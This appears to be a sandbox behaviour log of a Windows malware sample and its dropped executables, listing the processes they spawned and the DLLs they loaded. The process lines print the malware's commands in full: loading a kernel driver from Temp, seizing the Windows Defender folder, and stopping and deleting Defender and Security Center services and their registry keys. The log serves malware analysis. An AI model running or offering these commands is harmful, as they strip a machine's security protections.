Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Section loaded: userenv.dll
